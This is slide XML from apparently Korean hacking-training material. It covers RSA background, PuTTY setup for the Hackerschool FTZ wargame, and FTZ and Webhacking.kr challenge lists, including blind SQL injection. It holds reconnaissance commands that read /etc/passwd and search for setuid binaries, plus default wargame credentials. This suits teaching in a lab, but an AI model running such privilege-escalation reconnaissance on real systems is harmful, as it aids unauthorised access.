                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="100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/Training/Unit/Web/3</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> 2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>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참고</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/Training/Cipher/7</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>현대암호 실습 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>– RSA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>RSA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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RSA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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공개키 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="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RSA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"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/Training/Cipher/7</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>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RSA is a public-key cryptosystem that is widely used for secure data transmission. It is also one of the oldest. The acronym RSA comes from the surnames of Ron Rivest, Adi Shamir, and Leonard Adleman, who publicly described the algorithm in 1977. An equivalent system was developed secretly, in 1973 at GCHQ by the English mathematician Clifford Cocks. That system was declassified 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RSA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>는 안전한 데이터 전송에 널리 사용되는 공개 키 암호화 시스템입니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>또한 가장 오래된 것 중 하나입니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>RSA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>의 약어는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>Ron Rivest, Adi Shamir </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>및 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>Leonard Adleman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>의 성에서 유래되었으며 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>1977 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>년 알고리즘을 공개적으로 설명했습니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>1973 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>년 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>GCHQ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>에서 영어 수학자 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>Clifford Cocks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>에 의해 동일한 시스템이 비밀리에 개발되었습니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>이 시스템은 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>1997 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>년에 기밀 해제되었습니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="100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/Training/FTZ</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>해커스쿨 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>FTZ</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42080"/>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604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>setuid</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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8. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>다운받은 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>putty </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>설치  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>그냥 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>Next </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>누르면 설치됨</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>9. putty </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" err="1"/>
              <a:t>실행후</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>, FTZ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t> 서버 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>( 6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>번에서 확인한 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>주소</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>를 입력한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>.</a:t>
            </a:r>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10. Window -&gt; Translation </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>탭에 들어가서</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>, UTF-8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t> 을 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>Use font encoding </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>으로 바꾼다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="100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cut –f1 –d: /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/passwd</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>cut –f1 –d: /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/group</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>find / -user level4 –perm -4000 2&gt;/dev/null</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>logout</a:t>
            </a:r>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/Training/FTZ/1</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>  Level1</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>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cat hint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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>FTZ</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/Training/FTZ/2</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>  Level2</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>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cat hint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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>FTZ</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/Training/FTZ/3</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>  Level3</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>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cat hint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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>FTZ</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/Training/FTZ/4</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>  Level4</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>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cat hint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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>FTZ</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/Training/FTZ/5</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>  Level5</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>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cat hint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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>FTZ</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11. Window -&gt; Appearance </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>에 가서</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>, Change </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>를 누른다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>.</a:t>
            </a:r>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12. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>원하는 글꼴로 바꾸고</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>스크립트를 한글로 바꾼다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>.  -&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>확인 클릭 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>-&gt; Session </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>으로 다시 간다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="100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/Training/FTZ/6</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>  Level6</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>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cat hint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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>FTZ</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/Training/FTZ/7</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>  Level7</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>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cat hint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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>FTZ</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/Training/FTZ/8</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>  Level8</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>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cat hint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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>FTZ</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/Training/WHK</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>Webhacking.kr</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blind </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>sql</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t> injection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19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29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30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/Training/WHK/2</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>  old-02</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>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old-02</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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00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cat hint</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="100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16. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="100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13. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>설정을 저장한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>. FTZ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>입력 후 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>Save</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t> 버튼을 누른다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>.</a:t>
            </a:r>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a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>14. Open </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>을 클릭하여 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>FTZ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>서버로 접속한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>. ( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>어떤 메시지가 나오면 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>예</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>’ or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>‘yes’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>클릭 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>)</a:t>
            </a:r>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a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>15. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>로그인 화면이 나타나면</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>성공</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>! </a:t>
            </a:r>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marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod" startAt="10"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>해커스쿨은</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>, level1 ~ 30 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>으로 되어 있으며</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>, level1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>id </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>는</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>level1 / level1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>이다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>로그인을 시도해본다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="100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a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="4400" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>부록</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>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rPr>
              <a:t>강의안 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>– </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="280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rPr>
              <a:t>단위과제 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="280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rPr>
              <a:t>단위과제 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="280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rPr>
              <a:t>단위과제 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="280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rPr>
              <a:t>강의안 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>– </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="280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a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" kern="0">
                <a:solidFill>
